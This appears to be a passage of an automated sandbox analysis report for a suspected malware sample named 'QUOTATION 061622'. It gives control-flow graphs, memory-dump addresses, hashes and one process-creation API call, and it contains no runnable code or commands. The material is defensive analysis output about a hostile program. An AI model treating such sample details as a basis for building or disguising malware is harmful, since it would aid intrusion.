                                                          control_flow_graph 1657 4e20040-4e200ae 1662 4e200b4-4e2015b 1657->1662 1669 4e20161-4e2021f 1662->1669 1670 4e24b0b-4e24b34 1662->1670 1669->1670 1680 4e20225-4e20312 1669->1680 1680->1670 1688 4e20318-4e20733 1680->1688 1688->1670 1721 4e20739-4e20811 1688->1721 1721->1670 1729 4e20817-4e20d5a 1721->1729 1729->1670 1772 4e20d60-4e20e26 1729->1772 1772->1670 1778 4e20e2c-4e213ac 1772->1778 1778->1670 1821 4e213b2-4e2146e 1778->1821 1821->1670 1827 4e21474-4e218a5 1821->1827 1827->1670 1862 4e218ab-4e21904 1827->1862 1868 4e21906-4e21912 1862->1868 1869 4e21954-4e21bbb 1862->1869 1870 4e21914-4e2191a 1868->1870 1871 4e2191c-4e21922 1868->1871 1894 4e21bc1-4e21bca 1869->1894 1895 4e22038-4e2245c 1869->1895 1872 4e2192c-4e21951 1870->1872 1871->1872 1894->1670 1896 4e21bd0-4e21be7 1894->1896 1895->1670 1980 4e22462-4e22862 1895->1980 1899 4e21f83-4e22032 1896->1899 1900 4e21bed-4e21cc8 1896->1900 1899->1894 1899->1895 1926 4e21d97-4e21de5 1900->1926 1927 4e21cce-4e21cd4 1900->1927 1939 4e21e46-4e21e6d 1926->1939 1940 4e21de7-4e21e15 1926->1940 1927->1670 1928 4e21cda-4e21d91 1927->1928 1928->1926 1928->1927 1941 4e21e73-4e21f7e 1939->1941 1940->1939 1945 4e21e17-4e21e44 1940->1945 1941->1895 1945->1941 2014 4e22868-4e22924 1980->2014 2015 4e22929-4e229fe 1980->2015 2028 4e22a04-4e22b13 2014->2028 2015->2028 2038 4e22b19-4e22d27 2028->2038 2039 4e23cce-4e23f78 2028->2039 2038->1670 2082 4e22d2d-4e22dcd 2038->2082 2039->1670 2089 4e23f7e-4e23fab 2039->2089 2082->1670 2097 4e22dd3-4e22e66 2082->2097 2089->1670 2090 4e23fb1-4e240e5 2089->2090 2090->1670 2116 4e240eb-4e24359 2090->2116 2108 4e22e84-4e22e92 2097->2108 2109 4e22e68-4e22e6e 2097->2109 2115 4e22e94-4e22ea2 2108->2115 2109->1670 2110 4e22e74-4e22e82 2109->2110 2110->2115 2119 4e22ea8-4e22eb1 2115->2119 2120 4e239df-4e23b7e 2115->2120 2116->1670 2176 4e2435f-4e245eb 2116->2176 2119->2120 2124 4e22eb7-4e22ec0 2119->2124 2161 4e23b80-4e23cc8 2120->2161 2124->2120 2128 4e22ec6-4e2313c 2124->2128 2128->1670 2193 4e23142-4e23248 2128->2193 2161->2038 2161->2039 2176->1670 2225 4e245f1-4e24856 2176->2225 2193->1670 2211 4e2324e-4e234ea 2193->2211 2211->1670 2257 4e234f0-4e2376f 2211->2257 2225->1670 2263 4e2485c-4e24a0a 2225->2263 2257->1670 2298 4e23775-4e239d0 2257->2298 2263->1670 2289 4e24a10-4e24b08 2263->2289 2298->1670 2322 4e239d6-4e239da 2298->2322 2322->2161
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.482362677.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4e20000_QUOTATION 061622.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c6dfda6437d97f7dff6fe67e7d46acff59f1085fc243f832b8f3059b431c96e8
                                                          • Instruction ID: 54abe4308d612ad7cbbac4ea1d8dc37ddb2e0101c823abb9963f2a9e27cdcdf5
                                                          • Opcode Fuzzy Hash: c6dfda6437d97f7dff6fe67e7d46acff59f1085fc243f832b8f3059b431c96e8
                                                          • Instruction Fuzzy Hash: 03932C70D056288FCB24EF29E9856A8BBF2FB88315F0189E9D44CA3354DB746E85CF51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04E3AD28 Relevance: 4.3, Instructions: 4275COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2323 4e3ad28-4e3b045 2355 4e3b047-4e3b061 2323->2355 2356 4e3b064-4e3b35c 2323->2356 2355->2356 3174 4e3b35f call 4e2b100 2356->3174 3175 4e3b35f call 4e2b0f5 2356->3175 2389 4e3b361-4e3b363 2390 4e3f31a-4e3f328 2389->2390 2391 4e3b369-4e3bc05 2389->2391 2395 4e3f32f 2390->2395 2391->2395 2497 4e3bc0b-4e3bdf2 2391->2497 2397 4e3f334-4e3f343 2395->2397 3164 4e3f346 call 4e2b4d0 2397->3164 3165 4e3f346 call 4e2b4c9 2397->3165 2399 4e3f348 2401 4e3f34d-4e3f35c 2399->2401 3170 4e3f35f call 4e2b4d0 2401->3170 3171 4e3f35f call 4e2b4c9 2401->3171 2403 4e3f361 2405 4e3f520-4e3f52d 2403->2405 2497->2397 2519 4e3bdf8-4e3bff6 2497->2519 2519->2395 2544 4e3bffc-4e3c54c 2519->2544 3158 4e3c54f call 4e2b590 2544->3158 3159 4e3c54f call 4e2b589 2544->3159 2605 4e3c551-4e3cf27 3160 4e3cf2a call 4e2b650 2605->3160 3161 4e3cf2a call 4e2b649 2605->3161 2717 4e3cf2c-4e3cf3b 2718 4e3d5e3-4e3d5ea 2717->2718 2719 4e3cf41-4e3d5dd 2717->2719 2720 4e3d5f0-4e3d612 2718->2720 2721 4e3f305-4e3f313 2718->2721 2719->2718 3166 4e3d615 call 4e2b6f0 2720->3166 3167 4e3d615 call 4e2b6f8 2720->3167 2721->2390 2723 4e3d617-4e3db25 2844 4e3db2b-4e3e0a3 2723->2844 2934 4e3e0a9-4e3e1c8 2844->2934 2935 4e3e1cd-4e3e56f 2844->2935 3162 4e3e1cb call 4e2b6f0 2934->3162 3163 4e3e1cb call 4e2b6f8 2934->3163 2935->2844 3000 4e3e575-4e3e99f 2935->3000 3168 4e3e9a2 call 4e2b6f0 3000->3168 3169 4e3e9a2 call 4e2b6f8 3000->3169 3046 4e3e9a4-4e3ebda 3070 4e3ebe5-4e3eda8 3046->3070 3071 4e3ebdc-4e3ebdf 3046->3071 3070->2395 3092 4e3edae-4e3f203 3070->3092 3071->3070 3092->2401 3146 4e3f209-4e3f229 3092->3146 3172 4e3f22c call 4e2b7d0 3146->3172 3173 4e3f22c call 4e2b7c8 3146->3173 3148 4e3f22e-4e3f300 3148->2405 3158->2605 3159->2605 3160->2717 3161->2717 3162->2935 3163->2935 3164->2399 3165->2399 3166->2723 3167->2723 3168->3046 3169->3046 3170->2403 3171->2403 3172->3148 3173->3148 3174->2389 3175->2389
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.482400520.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4e30000_QUOTATION 061622.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e61a55172b72c958595018dfd04db6f5a721b9c096ddc4a70e62382f8e39422a
                                                          • Instruction ID: 1705edfdbf58ba3ac0e7943d3bb5b3d22b6e7211750ba871be2a33bc57275064
                                                          • Opcode Fuzzy Hash: e61a55172b72c958595018dfd04db6f5a721b9c096ddc4a70e62382f8e39422a
                                                          • Instruction Fuzzy Hash: 69837870E086188BCB14EF78D99979DB7B2EF88315F0189E9D488A3354DB35AE94CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0281AB7E Relevance: 3.2, Instructions: 3188COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 3176 281ab7e-281ab97 3177 281ab99-281aba3 3176->3177 3178 281aba8-281acb6 3176->3178 3177->3178 3192 281adc2-281ae10 3178->3192 3193 281acbc-281acc2 3178->3193 3203 281ae12-281ae43 3192->3203 3204 281ae74-281ae9b 3192->3204 3194 281e150-281e16a 3193->3194 3195 281acc8-281adbc 3193->3195 3195->3192 3195->3193 3203->3204 3208 281ae45-281ae72 3203->3208 3205 281aea1-281b550 3204->3205 3205->3194 3278 281b556-281ba75 3205->3278 3208->3205 3337 281bb79-281bc6a 3278->3337 3338 281ba7b-281bb74 3278->3338 3361 281bc70-281bd86 3337->3361 3338->3361 3372 281d1b0-281d46b 3361->3372 3373 281bd8c-281bfc7 3361->3373 3372->3194 3430 281d471-281d49e 3372->3430 3373->3194 3428 281bfcd-281c0b4 3373->3428 3428->3194 3452 281c0ba-281c17d 3428->3452 3430->3194 3432 281d4a4-281d5bf 3430->3432 3432->3194 3454 281d5c5-281d88b 3432->3454 3473 281c19b-281c1a9 3452->3473 3474 281c17f-281c185 3452->3474 3454->3194 3531 281d891-281db41 3454->3531 3479 281c1ab-281c1b9 3473->3479 3474->3194 3475 281c18b-281c199 3474->3475 3475->3479 3482 281ce6a-281d04d 3479->3482 3483 281c1bf-281c1cb 3479->3483 3543 281d04f-281d1aa 3482->3543 3483->3482 3488 281c1d1-281c1dd 3483->3488 3488->3482 3492 281c1e3-281c492 3488->3492 3492->3194 3578 281c498-281c585 3492->3578 3531->3194 3608 281db47-281dddf 3531->3608 3543->3372 3543->3373 3578->3194 3603 281c58b-281c891 3578->3603 3603->3194 3666 281c897-281cb71 3603->3666 3608->3194 3657 281dde5-281dfef 3608->3657 3657->3194 3699 281dff5-281e14d 3657->3699 3666->3194 3725 281cb77-281ce5b 3666->3725 3725->3194 3758 281ce61-281ce65 3725->3758 3758->3543
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481785655.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2810000_QUOTATION 061622.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: aca419712455a195bf89d2349a803341b33dd5cf26a8d55790645098dcb32b98
                                                          • Instruction ID: 9a7b44564f9b5ce2353264964878214b2a33f431a724808ecaddbf822ccbca7f
                                                          • Opcode Fuzzy Hash: aca419712455a195bf89d2349a803341b33dd5cf26a8d55790645098dcb32b98
                                                          • Instruction Fuzzy Hash: 7E534674E486188FCB14EF78DC84799BBB6EB88305F0189E9D94CA3394DB346A94CF51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04E257E8 Relevance: 2.6, Instructions: 2603COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 3759 4e257e8-4e2591d 3772 4e25923-4e25af7 3759->3772 3773 4e2a31c-4e2a372 3759->3773 3772->3773 3812 4e25afd-4e25bdb 3772->3812 3776 4e2a374-4e2a376 3773->3776 3777 4e2a3bb-4e2a424 3773->3777 3778 4e2a426-4e2a42a 3777->3778 3779 4e2a438-4e2a44f 3777->3779 3781 4e2a473-4e2a482 3778->3781 3782 4e2a42c-4e2a434 3778->3782 3783 4e2a450-4e2a45c 3779->3783 3785 4e2a484-4e2a49d 3781->3785 3782->3779 3786 4e2a45f-4e2a46a 3783->3786 3785->3785 3787 4e2a49e-4e2a4ac 3785->3787 3788 4e2a46b-4e2a46c 3786->3788 3790 4e2a4ad-4e2a4c0 3787->3790 3788->3783 3791 4e2a46d 3788->3791 3790->3786 3793 4e2a4c2-4e2a4dc 3790->3793 3791->3783 3792 4e2a46f-4e2a470 3791->3792 3792->3781 3793->3788 3796 4e2a4de-4e2a4e4 3793->3796 3796->3790 3798 4e2a4e6-4e2a58b call 4e2a5c3 3796->3798 3812->3773 3820 4e25be1-4e25fc9 3812->3820 3820->3773 3853 4e25fcf-4e2609e 3820->3853 3853->3773 3860 4e260a4-4e265a4 3853->3860 3860->3773 3902 4e265aa-4e266aa 3860->3902 3902->3773 3911 4e266b0-4e26c04 3902->3911 3911->3773 3957 4e26c0a-4e26ce0 3911->3957 3957->3773 3965 4e26ce6-4e271d5 3957->3965 3965->3773 4006 4e271db-4e27234 3965->4006 4012 4e27236-4e27242 4006->4012 4013 4e27284-4e27521 4006->4013 4014 4e27244-4e2724a 4012->4014 4015 4e2724c-4e27252 4012->4015 4041 4e27961-4e27dd4 4013->4041 4042 4e27527-4e27530 4013->4042 4016 4e2725c-4e27281 4014->4016 4015->4016 4041->3773 4124 4e27dda-4e28246 4041->4124 4042->3773 4043 4e27536-4e2754d 4042->4043 4047 4e27553-4e27625 4043->4047 4048 4e278be-4e2795b 4043->4048 4069 4e276e3-4e27731 4047->4069 4070 4e2762b-4e27631 4047->4070 4048->4041 4048->4042 4081 4e27792-4e277b9 4069->4081 4082 4e27733-4e27761 4069->4082 4070->3773 4072 4e27637-4e276dd 4070->4072 4072->4069 4072->4070 4084 4e277bf-4e278b9 4081->4084 4082->4081 4088 4e27763-4e27790 4082->4088 4084->4041 4088->4084 4162 4e282fa-4e283b7 4124->4162 4163 4e2824c-4e282f5 4124->4163 4174 4e283bd-4e297e4 4162->4174 4163->4174 4174->3773 4198 4e297ea-4e29817 4174->4198 4198->3773 4199 4e2981d-4e2991a 4198->4199 4199->3773 4208 4e29920-4e29b95 4199->4208 4208->3773 4229 4e29b9b-4e29e44 4208->4229 4229->3773 4253 4e29e4a-4e2a0a6 4229->4253 4253->3773 4272 4e2a0ac-4e2a217 4253->4272 4272->3773 4283 4e2a21d-4e2a2fc 4272->4283 4291 4e2a304-4e2a319 4283->4291 4291->3773
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.482362677.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4e20000_QUOTATION 061622.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 71d06d5f85c76c1bf250a0450b324ede0f59ec31715b9cbdd47a8590bc35a0a2
                                                          • Instruction ID: d5c2402145e0d6fc7af1c5f378cb714cf9159a651dfe83a706c245ea1b2125f5
                                                          • Opcode Fuzzy Hash: 71d06d5f85c76c1bf250a0450b324ede0f59ec31715b9cbdd47a8590bc35a0a2
                                                          • Instruction Fuzzy Hash: 5543F970D156288FCB65EF29E98969CBBB2FB88304F0189E9D44CA3354DB346E85CF51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04E293D9 Relevance: 2.0, Instructions: 2046COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 4657 4e293d9-4e293f9 4658 4e29401-4e294f9 4657->4658 4667 4e294fb-4e29647 4658->4667 4680 4e284b0-4e286b6 4667->4680 4681 4e2964d-4e297e4 4667->4681 4709 4e2a31c-4e2a372 4680->4709 4750 4e286bc-4e2875d 4680->4750 4708 4e297ea-4e29817 4681->4708 4681->4709 4708->4709 4710 4e2981d-4e2991a 4708->4710 4715 4e2a374-4e2a376 4709->4715 4716 4e2a3bb-4e2a424 4709->4716 4710->4709 4749 4e29920-4e29b95 4710->4749 4717 4e2a426-4e2a42a 4716->4717 4718 4e2a438-4e2a44f 4716->4718 4721 4e2a473-4e2a482 4717->4721 4722 4e2a42c-4e2a434 4717->4722 4723 4e2a450-4e2a45c 4718->4723 4724 4e2a484-4e2a49d 4721->4724 4722->4718 4725 4e2a45f-4e2a46a 4723->4725 4724->4724 4726 4e2a49e-4e2a4ac 4724->4726 4729 4e2a46b-4e2a46c 4725->4729 4730 4e2a4ad-4e2a4c0 4726->4730 4729->4723 4731 4e2a46d 4729->4731 4730->4725 4733 4e2a4c2-4e2a4dc 4730->4733 4731->4723 4732 4e2a46f-4e2a470 4731->4732 4732->4721 4733->4729 4738 4e2a4de-4e2a4e4 4733->4738 4738->4730 4740 4e2a4e6-4e2a58b call 4e2a5c3 4738->4740 4749->4709 4802 4e29b9b-4e29e44 4749->4802 4750->4709 4761 4e28763-4e28801 4750->4761 4775 4e28803-4e28809 4761->4775 4776 4e2881f-4e2882d 4761->4776 4775->4709 4777 4e2880f-4e2881d 4775->4777 4781 4e2882f-4e2883d 4776->4781 4777->4781 4784 4e28843-4e2884c 4781->4784 4785 4e2936c-4e293d3 4781->4785 4784->4785 4790 4e28852-4e2885b 4784->4790 4785->4657 4790->4785 4796 4e28861-4e28ac1 4790->4796 4796->4709 4838 4e28ac7-4e28b94 4796->4838 4802->4709 4851 4e29e4a-4e2a0a6 4802->4851 4838->4709 4850 4e28b9a-4e28e23 4838->4850 4850->4709 4893 4e28e29-4e290fb 4850->4893 4851->4709 4888 4e2a0ac-4e2a217 4851->4888 4888->4709 4910 4e2a21d-4e2a2f1 4888->4910 4893->4709 4934 4e29101-4e2935d 4893->4934 4924 4e2a2f9-4e2a2fc 4910->4924 4926 4e2a304-4e2a319 4924->4926 4926->4709 4934->4709 4953 4e29363-4e29367 4934->4953 4953->4667
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.482362677.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4e20000_QUOTATION 061622.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6c006e6cc9732d7d4f00963b29b7895ce5953944f8f3a8bba3406cdd3d14c7fe
                                                          • Instruction ID: 089c1908980c5452889377fc560d89c760f03eb91a88e55366e93260119b3f1a
                                                          • Opcode Fuzzy Hash: 6c006e6cc9732d7d4f00963b29b7895ce5953944f8f3a8bba3406cdd3d14c7fe
                                                          • Instruction Fuzzy Hash: C8138E709096688FCB25EF39DD85698BBB2FF84205F0189EAC48CD3255DB386E85CF51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04E2B100 Relevance: 1.8, APIs: 1, Instructions: 261processCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 5011 4e2b100-4e2b199 5013 4e2b19b-4e2b1c0 5011->5013 5014 4e2b1ed-4e2b20d 5011->5014 5013->5014 5017 4e2b1c2-4e2b1c4 5013->5017 5018 4e2b261-4e2b292 5014->5018 5019 4e2b20f-4e2b234 5014->5019 5020 4e2b1c6-4e2b1d0 5017->5020 5021 4e2b1e7-4e2b1ea 5017->5021 5027 4e2b294-4e2b2bc 5018->5027 5028 4e2b2e9-4e2b3a3 CreateProcessAsUserA 5018->5028 5019->5018 5029 4e2b236-4e2b238 5019->5029 5022 4e2b1d2 5020->5022 5023 4e2b1d4-4e2b1e3 5020->5023 5021->5014 5022->5023 5023->5023 5026 4e2b1e5 5023->5026 5026->5021 5027->5028 5037 4e2b2be-4e2b2c0 5027->5037 5041 4e2b3a5-4e2b3ab 5028->5041 5042 4e2b3ac-4e2b420 5028->5042 5030 4e2b23a-4e2b244 5029->5030 5031 4e2b25b-4e2b25e 5029->5031 5034 4e2b246 5030->5034 5035 4e2b248-4e2b257 5030->5035 5031->5018 5034->5035 5035->5035 5036 4e2b259 5035->5036 5036->5031 5039 4e2b2c2-4e2b2cc 5037->5039 5040 4e2b2e3-4e2b2e6 5037->5040 5043 4e2b2d0-4e2b2df 5039->5043 5044 4e2b2ce 5039->5044 5040->5028 5041->5042 5053 4e2b422-4e2b426 5042->5053 5054 4e2b430-4e2b434 5042->5054 5043->5043 5045 4e2b2e1 5043->5045 5044->5043 5045->5040 5053->5054 5055 4e2b428 5053->5055 5056 4e2b436-4e2b43a 5054->5056 5057 4e2b444-4e2b448 5054->5057 5055->5054 5056->5057 5058 4e2b43c 5056->5058 5059 4e2b44a-4e2b44e 5057->5059 5060 4e2b458-4e2b45c 5057->5060 5058->5057 5059->5060 5061 4e2b450 5059->5061 5062 4e2b46e-4e2b475 5060->5062 5063 4e2b45e-4e2b464 5060->5063 5061->5060 5064 4e2b477-4e2b486 5062->5064 5065 4e2b48c 5062->5065 5063->5062 5064->5065 5067 4e2b48d 5065->5067 5067->5067
                                                          APIs
                                                          • CreateProcessAsUserA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?), ref: 04E2B390
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.482362677.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4e20000_QUOTATION 061622.jbxd
                                                          Similarity
                                                          • API ID: CreateProcessUser
                                                          • String ID:
                                                          • API String ID: 2217836671-0
                                                          • Opcode ID: 15efb106560961d03d5496c4d8d72febe5b6f39acf1997548800b9f660d010db
                                                          • Instruction ID: 27df2c4471fe4bcb2e73be8ad4031775716bb9b3f6cc8f00951cd4b0db7c751c
                                                          • Opcode Fuzzy Hash: 15efb106560961d03d5496c4d8d72febe5b6f39acf1997548800b9f660d010db
                                                          • Instruction Fuzzy Hash: A9A15C71D002299FDB14CFA9C9817EDBBB6FF48308F048569E818A7291DB74A985CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 028103F0 Relevance: 4.5, Strings: 2, Instructions: 1954COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 678 28103f0-281048d 686 2810495-281049b 678->686 1156 28104a1 call 2812c54 686->1156 1157 28104a1 call 2812c9f 686->1157 687 28104a7-28104c8 689 28104d0-28104d6 687->689 1158 28104dc call 2812c54 689->1158 1159 28104dc call 2812c9f 689->1159 690 28104e2-2810554 697 281055c-2810562 690->697 698 281056e 697->698 699 2810578-281058a 698->699 700 2810592-28105b3 699->700 702 28105bb-28105c1 700->702 1160 28105c7 call 4e257e8 702->1160 1161 28105c7 call 4e257d9 702->1161 703 28105cd-28105f9 706 2810601-2810607 703->706 707 2810613-281063f 706->707 710 2810647-281064d 707->710 711 2810659-28106cb 710->711 718 28106d3-28106d9 711->718 719 28106e5-2810808 718->719 735 2810810-2810816 719->735 736 2810822-281084e 735->736 739 2810856-281085c 736->739 740 2810868-28108da 739->740 747 28108e2-28108e8 740->747 748 28108f4-2810920 747->748 751 2810928-281092e 748->751 752 281093a-28109a1 751->752 758 28109a9-28109af 752->758 759 28109bb-2810a68 758->759 769 2810a70-2810a76 759->769 770 2810a82-2810b53 769->770 782 2810b5b-2810b61 770->782 783 2810b6d-2810efc 782->783 831 2810f04-2810f10 call 281ab7e 783->831 832 2810f16-2810f94 831->832 839 2810f9c-2810fa8 call 281ab7e 832->839 840 2810fae-28110c4 839->840 855 28110cc-28110d2 840->855 856 28110de-2811110 855->856 859 2811118-281111e 856->859 860 281112a-28111a8 859->860 867 28111b0-28111b6 860->867 868 28111c2-2811281 867->868 878 2811289-281128f 868->878 879 281129b-28112cd 878->879 882 28112d5-28112db 879->882 883 28112e7-28115a4 882->883 919 28115ac-28115b2 883->919 1168 28115b8 call 4e20040 919->1168 1169 28115b8 call 4e20007 919->1169 920 28115be-2811756 941 281175e-2811764 920->941 1154 281176a call 4e257e8 941->1154 1155 281176a call 4e257d9 941->1155 942 2811770-2811886 957 281188e-2811894 942->957 958 28118a0-28118d2 957->958 961 28118da-28118e0 958->961 962 28118ec-28119a0 961->962 971 28119a8-28119ae 962->971 1165 28119b4 call 4e257e8 971->1165 1166 28119b4 call 4e257d9 971->1166 1167 28119b4 call 4e293d9 971->1167 972 28119ba-2811ec1 1038 2811ec9-2811ecf 972->1038 1039 2811edb-281230c 1038->1039 1095 2812316-281232e 1039->1095 1096 2812336-2812758 1095->1096 1151 2812760-2812772 call 4d9024c 1096->1151 1153 2812778-281277d 1151->1153 1154->942 1155->942 1156->687 1157->687 1158->690 1159->690 1160->703 1161->703 1165->972 1166->972 1167->972 1168->920 1169->920
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481785655.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2810000_QUOTATION 061622.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Cs${Cs
                                                          • API String ID: 0-2844429991
                                                          • Opcode ID: 6bd2d84d256ae737438761f2369598c39db90ecdafec5e8dc943b96702c2cfd2
                                                          • Instruction ID: 680da1876462f3ebebf46b05e5a32cb7b1fdd00ef19f13d7570d8a9f0d0c33b3
                                                          • Opcode Fuzzy Hash: 6bd2d84d256ae737438761f2369598c39db90ecdafec5e8dc943b96702c2cfd2
                                                          • Instruction Fuzzy Hash: D2133C75C40518CFCB15BFB8E9486ADBBB9FF49705F000AEAD589561A4DF300AA8CF52
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02810448 Relevance: 4.4, Strings: 2, Instructions: 1923COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1170 2810448-281049b 1643 28104a1 call 2812c54 1170->1643 1644 28104a1 call 2812c9f 1170->1644 1174 28104a7-28104d6 1645 28104dc call 2812c54 1174->1645 1646 28104dc call 2812c9f 1174->1646 1177 28104e2-28105c1 1647 28105c7 call 4e257e8 1177->1647 1648 28105c7 call 4e257d9 1177->1648 1190 28105cd-28115b2 call 281ab7e * 2 1655 28115b8 call 4e20040 1190->1655 1656 28115b8 call 4e20007 1190->1656 1407 28115be-2811764 1641 281176a call 4e257e8 1407->1641 1642 281176a call 4e257d9 1407->1642 1429 2811770-28119ae 1652 28119b4 call 4e257e8 1429->1652 1653 28119b4 call 4e257d9 1429->1653 1654 28119b4 call 4e293d9 1429->1654 1459 28119ba-2812772 call 4d9024c 1640 2812778-281277d 1459->1640 1641->1429 1642->1429 1643->1174 1644->1174 1645->1177 1646->1177 1647->1190 1648->1190 1652->1459 1653->1459 1654->1459 1655->1407 1656->1407
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481785655.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2810000_QUOTATION 061622.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Cs${Cs
                                                          • API String ID: 0-2844429991
                                                          • Opcode ID: 5a4ffc76427de663d150420be6bd6d23181790c8550cf7c61f3305fd809d76e3
                                                          • Instruction ID: 8f624da20d1e540f528f4113e32cedc76f46cdb3cbe0dc10e901b454624add84
                                                          • Opcode Fuzzy Hash: 5a4ffc76427de663d150420be6bd6d23181790c8550cf7c61f3305fd809d76e3
                                                          • Instruction Fuzzy Hash: 06133D75C40518CFCB55BFB8E9486ADBBB9FF48705F000AEAD589561A4DF300AA8CF52
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04D90394 Relevance: 2.5, Strings: 2, Instructions: 42COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 4293 4d90394-4d903b8 4294 4d903ba-4d903c0 4293->4294 4295 4d903d0-4d903d4 4293->4295 4296 4d903c2 4294->4296 4297 4d903c4-4d903ce 4294->4297 4298 4d903ee-4d903fb 4295->4298 4299 4d903d6-4d903dc 4295->4299 4296->4295 4297->4295 4301 4d903de 4299->4301 4302 4d903e0-4d903ec 4299->4302 4301->4298 4302->4298
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.482325593.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4d90000_QUOTATION 061622.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: x0m$x0m
                                                          • API String ID: 0-368267314
                                                          • Opcode ID: 1ee659d12b8fb2cb7395213e333bc92ce2bd7b5bdfec8dfae90d11682c315389
                                                          • Instruction ID: fbdebb9975e9422fc42fe0e9c17a3d979fcf02bbcb799e0caa673dddfbe5da19
                                                          • Opcode Fuzzy Hash: 1ee659d12b8fb2cb7395213e333bc92ce2bd7b5bdfec8dfae90d11682c315389
                                                          • Instruction Fuzzy Hash: 9EF0C825B0E7A15FCF2B0728682106A2BD25EC641470D81FB8581CB297D9259C43C3E3
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04D9024C Relevance: 2.5, Strings: 2, Instructions: 41COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 4305 4d9024c-4d90270 4306 4d90288-4d9028c 4305->4306 4307 4d90272-4d90278 4305->4307 4308 4d9028e-4d90294 4306->4308 4309 4d902a6-4d902aa 4306->4309 4310 4d9027a 4307->4310 4311 4d9027c-4d90286 4307->4311 4312 4d90298-4d902a4 4308->4312 4313 4d90296 4308->4313 4314 4d902b1-4d902b3 4309->4314 4310->4306 4311->4306 4312->4309 4313->4309
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.482325593.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4d90000_QUOTATION 061622.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: x0m$x0m
                                                          • API String ID: 0-368267314
                                                          • Opcode ID: 8f9cf8a7c7bb1079f664c60509900dbfd27282660b13bf6953654f2da3ee0eb9
                                                          • Instruction ID: 2d72e6b5ed649dc94d2db62f8f5cbcc6d94bd07d9a4da92305d30f7048efaa7b
                                                          • Opcode Fuzzy Hash: 8f9cf8a7c7bb1079f664c60509900dbfd27282660b13bf6953654f2da3ee0eb9
